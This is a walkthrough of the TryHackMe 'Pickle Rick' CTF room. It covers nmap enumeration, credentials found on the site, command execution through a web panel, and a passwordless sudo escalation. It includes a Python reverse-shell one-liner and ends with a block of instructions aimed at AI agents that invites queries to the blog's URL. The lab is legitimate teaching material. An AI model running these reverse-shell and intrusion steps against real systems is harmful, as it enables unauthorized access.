# Pickle Rick ### [Pickle Rick](https://www.tryhackme.com/room/picklerick) ### A Rick and Morty CTF. Help turn Rick back into a human! ### Pickle Rick is a Rick and Morty themed tryhackme room where we exploit a webserver to find 3 ingredients or flags. ## Questions : 1. What is the first ingredient Rick needs? 2. What's the second ingredient Rick needs? 3. What's the final ingredient Rick needs? ## Enumeration ### NMAP > nmap -sS -sC -sV -A -O -vv BOX\_IP #### output ``` PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 08:16:72:a6:42:80:aa:21:3f:9e:2a:76:4c:bc:45:0d (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDibc1nVIGXaLx8nF5hflDtQi7KVayIQjoV/97QvFHpe67phA9ozRb+o0Azrp3UBxc6zlGDJiPRPdgXZUL53Zygvip9Tj/8GYucBA1yzcN5gtWfR7cVG/vZo/ToDD2bTiVbMy1fW7zWa9Le9VEytFnsBFOk0ePEn5rI7wLuZ+HHaVTJegtq6KIVw9eQUCxTqfjEvFxCyJMSbwPXWdURGwVYOW3VVpU8awDkklUZRQ/ElsKGJLLF+CjtQ3/+aT9VeWKIP8n/k+ymFL0zvkygEGdMaUOFBiaZd8FAAiBAbHXNGg2Scsnmid8V9sXS0tyN4OuItZ7Xc26eKmlsCzDkJlJJ | 256 38:e1:90:b4:69:a0:49:f8:1d:cb:d5:1a:79:22:a2:b1 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGo31VvNkXrpUtTcaSzV68TxybntTXNKXfLV7uueau4r5ROiko7CqYXSBBbcKovi06b+fPCIxdnu84ZHNrMK41Q= | 256 a0:48:4b:8f:87:64:67:ca:d3:d3:61:3a:b2:80:f3:8e (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlvtA3D1u0/IPcguHsofaDoMS4J2/VyFUsc5Ko+hKtM 80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Rick is sup4r cool ``` we have two open ports, 20 (ssh) and 80 (apache2 httpd) ## Site ![](https://user-images.githubusercontent.com/53917092/95249981-e118a900-07ef-11eb-8a7e-cbdd288c1cb3.png) ### Source Code ![](https://user-images.githubusercontent.com/53917092/95249935-d0683300-07ef-11eb-8e78-d666c56d47fc.png) > Username: R1ckRul3s ### find out interesting directories and files robots.txt [![image](https://user-images.githubusercontent.com/53917092/95252646-a4e74780-07f3-11eb-8898-a829866a4218.png)](https://user-images.githubusercontent.com/53917092/95252646-a4e74780-07f3-11eb-8898-a829866a4218.png) (a string like a password???) ### Login trying to login with User:R1ckRul3s and Password:Wubbalubbadubdub in /login.php ![](https://user-images.githubusercontent.com/53917092/95253093-466e9900-07f4-11eb-89b8-cf9c15df7677.png) ![](https://user-images.githubusercontent.com/53917092/95253107-4cfd1080-07f4-11eb-9bca-459a05af45f4.png) #### Success ### RCE on this panel, we were able to execute commands on the system [![image](https://user-images.githubusercontent.com/53917092/95253253-85045380-07f4-11eb-9ebd-1a4f1dededdf.png)](https://user-images.githubusercontent.com/53917092/95253253-85045380-07f4-11eb-9ebd-1a4f1dededdf.png) then let's try a reverse shell from that for this we will use python, so we have to know where it is (and if it exists) ![](https://user-images.githubusercontent.com/53917092/95253426-b9780f80-07f4-11eb-9a18-c8905ac8b69d.png) all right, let's run the reverse shell ``` python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` (changing the ip address for my thm-vpn IP) ### Reverse Shell ![](https://user-images.githubusercontent.com/53917092/95253810-55098000-07f5-11eb-994a-3c6b88ee9c85.png) #### Shell to TTY > python3 -c "import pty; pty.spawn('/bin/bash')" ![](https://user-images.githubusercontent.com/53917092/95254413-3f488a80-07f6-11eb-9a0d-9b3ae8d00ca3.png) ### answering the first question > cat Sup3rS3cretPickl3Ingred.txt [![image](https://user-images.githubusercontent.com/53917092/95254695-a7976c00-07f6-11eb-9be7-a3e4041c6b1d.png)](https://user-images.githubusercontent.com/53917092/95254695-a7976c00-07f6-11eb-9be7-a3e4041c6b1d.png) ### walking to the second question ![](https://user-images.githubusercontent.com/53917092/95254893-f8a76000-07f6-11eb-9793-c4acdad204f9.png) ### answering the second question ![](https://user-images.githubusercontent.com/53917092/95255082-402dec00-07f7-11eb-8d45-bb296536341f.png) ### walking to root looking at the commands that the user can run > sudo -l ![](https://user-images.githubusercontent.com/53917092/95255409-b03c7200-07f7-11eb-90f2-b852d6f149dc.png) EASY!!!!! We can run ANY command as root without password :O ## Root flag (3rd question) [![image](https://user-images.githubusercontent.com/53917092/95255573-fdb8df00-07f7-11eb-9447-99a43927e285.png)](https://user-images.githubusercontent.com/53917092/95255573-fdb8df00-07f7-11eb-9447-99a43927e285.png) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blog.verni.lol/try-hack-me-write-ups/pickle-rick.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.